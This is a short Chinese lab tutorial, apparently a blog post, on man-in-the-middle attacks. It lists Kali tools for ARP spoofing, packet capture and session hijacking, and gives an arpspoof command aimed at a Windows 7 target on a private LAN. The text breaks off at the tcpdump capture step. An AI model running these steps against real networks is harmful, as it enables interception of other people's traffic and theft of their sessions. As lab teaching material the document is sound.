中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。
本文所讨论的攻击方法仅供技术交流,禁止违法使用
工具
kali:
- arpspoof:arp欺骗
- tcpdump:dump数据包
- Ferret:处理数据包
- Hamster:提供web服务交互控制
拓扑
靶机:windows 7 (ip:192.168.1.114)
攻击机:kali 3.14(ip:192.168.1.118)
网关:192.168.1.1
攻击
网络连通
攻击机ping靶机,确保可以ping通
arp欺骗
arpspoof -i eth0 -t 192.168.1.1 192.168.1.114
抓取数据包
tcpdump